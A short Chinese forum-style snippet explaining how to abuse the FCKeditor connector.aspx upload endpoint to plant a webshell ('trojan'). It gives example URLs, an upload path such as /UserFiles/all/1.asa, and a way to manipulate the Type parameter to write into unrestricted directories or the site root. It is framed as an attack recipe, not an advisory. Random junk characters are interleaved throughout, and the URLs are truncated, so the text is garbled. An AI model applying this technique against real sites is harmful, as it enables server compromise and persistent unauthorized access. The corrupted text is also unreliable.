出现上传漏洞的地址是:
8 d: g( y7 X( @' R$ Z. Dhttp://www.xxx.com/admin/FCKedit ... aspx/connector.aspx4 d0 @% M3 H* f; |6 m
打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:
1 m! M6 R- X, \' [+ F) b+ h4 khttp://www.xxx.com/UserFiles/all/1.asa
! Q- y u, b% D& k2 n: \+ C"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.) w, X P( I7 J5 s( n0 ^
比如输入:
' b/ W% l) a3 F/ M! z0 d( G! phttp://www.xxx.com/admin/FCKedit ... aspx/connector.aspx1 E+ U2 O4 A4 \% H4 K
所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了/ L6 _! U; b2 O, J5 s/ H
而如果这样输入:http://www.xxx.com/admin/FCKedit ... aspx/connector.aspx
" G9 o# B1 `) q8 ~+ Q, D# `3 ?就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了. |